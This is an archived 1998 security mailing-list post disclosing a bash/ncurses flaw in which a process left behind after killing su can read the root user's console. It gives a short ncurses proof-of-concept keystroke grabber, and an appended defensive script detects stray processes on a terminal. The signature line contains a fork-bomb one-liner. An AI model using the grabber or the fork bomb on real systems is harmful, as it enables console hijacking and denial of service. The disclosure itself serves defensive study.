bash 2.01 / ncurses 4.1 console takeover "feature"

From: Michal Zalewski (lcamtufat_private)
Date: Sat Mar 07 1998 - 12:06:21 PST

    With bash 2.01 and ncurses 4.1, any program launched at an unprivileged
    uid (e.g. from an 'su' shell) may take over the privileged user's console
    (to grab keystrokes or something else). I found it's quite easy when
    I tried to kill 'su' directly from the unprivileged shell with signal 9:
    
    [root@genome /]# su lcam
    [lcam@genome /]$ killall -9 su
    Killed
    [root@genome /]#
    
    That was normal, but suddenly I saw the old prompt again:
    
    [lcam@genome /]$
    
    From this point, two bash instances (the unprivileged one hadn't been
    killed with su!) were controlling my console at once... It looks
    just curious:
    
    [root@genome /]# id
    uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
    [lcam@genome /]$ id
    uid=502(lcam) gid=502(lcam) groups=502(lcam)
    [lcam@genome /]$
    [root@genome /]#
    
    Of course, it isn't so scary, because it has been done manually...
    But it can easily be used in a nasty program. A typical administrator
    believes that only the unprivileged account may be compromised when
    he's launching something on it, and usually he's right, but
    ncurses has a vulnerability which may be used to fool him. Unlike
    other lame su tricks, it's quite invisible (he may check on a
    second console - he's back in his REAL, root shell, but we can
    still control his console). I wrote a simple program (it may even be
    launched from ~/.bashrc; in the meantime, su should be killed), which
    is able to grab keystroke(s) from the console:
    
    -- test.c --
    // gcc test.c -lncurses -oanything
    #include <curses.h>
    #include <stdlib.h>   /* system() */

    int main(void) {
      initscr();   /* take over the terminal ncurses finds on stdin/stdout */
      noecho();    /* do not echo the keystrokes we read */
      raw();       /* deliver every keystroke immediately, uninterpreted */
      /* Sit on the console forever; each 'x' we manage to read leaves a mark. */
      for (;;)
        if (getch() == 'x')
          system("touch /tmp/VOILA");
    }
    -- eof --
    
    It isn't perfect, actually it grabs only one of the first 'x's, and fails
    to grab the next ones (a lot of I/O errors when debugged ;-). But it
    CAN do that. For sure it's possible to keep control much longer, as
    shown above (bash example). Maybe it's even possible to do it
    after logout, I haven't checked it.
    
    _______________________________________________________________________
    Michał Zalewski [tel 9690] | finger 4 PGP [lcamtufat_private]
    To iterate is human, to recurse divine [P. Deutsch]
    =--------------- [ echo "\$0&\$0">_;chmod +x _;./_ ] -----------------=
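A check for the situation described in the post, as an added example that is not part of the original message: a shell function that lists the processes still attached to a terminal but belonging to a different user or a different session than the shell that owns it, which is how the orphaned 'lcam' bash and the ncurses grabber look from the root side. It assumes a Linux procps `ps` (the `-eo user,pid,pgid,sid,tty,comm` keywords and `ps -o sid= -p`) plus the usual `tty`, `id`, `sed` and `awk`; the sample rows embedded in it are constructed for the post's scenario, not captured output.

```shell
#!/bin/sh
# Added example, not code from the original post. Lists processes that are
# attached to a terminal but are not part of the terminal owner's session,
# or run as a different user. Assumes a procps-style ps (Linux).
#
# tty_strangers TTY USER SID  < ps-output
#   Reads rows in the layout produced by
#       ps -eo user,pid,pgid,sid,tty,comm
#   (USER PID PGID SID TTY COMMAND), prints every row whose TTY matches
#   and whose user or session id differs from the owner's, and returns
#   1 if it printed anything, 0 if the terminal is clean.
tty_strangers() {
    awk -v tty="$1" -v user="$2" -v sid="$3" '
        $1 == "USER" { next }                       # ps header line
        $5 == tty && ($1 != user || $4 != sid) {
            print
            found = 1
        }
        END { exit (found ? 1 : 0) }
    '
}

# check_my_tty: run the check on the live system for the calling shell.
# tty(1) prints /dev/pts/N or /dev/ttyN while ps prints pts/N or ttyN,
# hence the sed; "sid" is a procps keyword (assumption: Linux ps).
check_my_tty() {
    mytty=$(tty | sed 's#^/dev/##')
    mysid=$(ps -o sid= -p $$ | tr -d ' ')
    ps -eo user,pid,pgid,sid,tty,comm | tty_strangers "$mytty" "$(id -un)" "$mysid"
}

# Constructed sample (not real ps output) for the post's scenario: root's
# login shell, session 1200, on tty1 right after 'killall -9 su', with the
# unprivileged bash and the ncurses grabber still alive on the same tty.
SAMPLE_PS='USER PID PGID SID TTY COMMAND
root 1200 1200 1200 tty1 bash
root 1350 1350 1200 tty1 ps
lcam 1301 1301 1200 tty1 bash
lcam 1305 1301 1200 tty1 anything
root 900 900 900 pts/0 bash'

# demo: prints the two lcam processes and exits 1 (clean tty would exit 0).
demo() {
    printf '%s\n' "$SAMPLE_PS" | tty_strangers tty1 root 1200
}
```

Run `check_my_tty` from the shell you suspect: a non-empty listing means something other than your own job tree is reading the same terminal, and the PGID/SID columns show whether it was left behind in your session (as in the post, where su did not start a new session) or arrived with one of its own. The structural fix is to give the unprivileged child its own pseudo-terminal instead of the caller's real one; modern util-linux `su` does this with `--pty` (`-P`), and sudo with the `use_pty` option, so that killing the intermediary leaves the child with no handle on the administrator's console.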
    
    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:44:36 PDT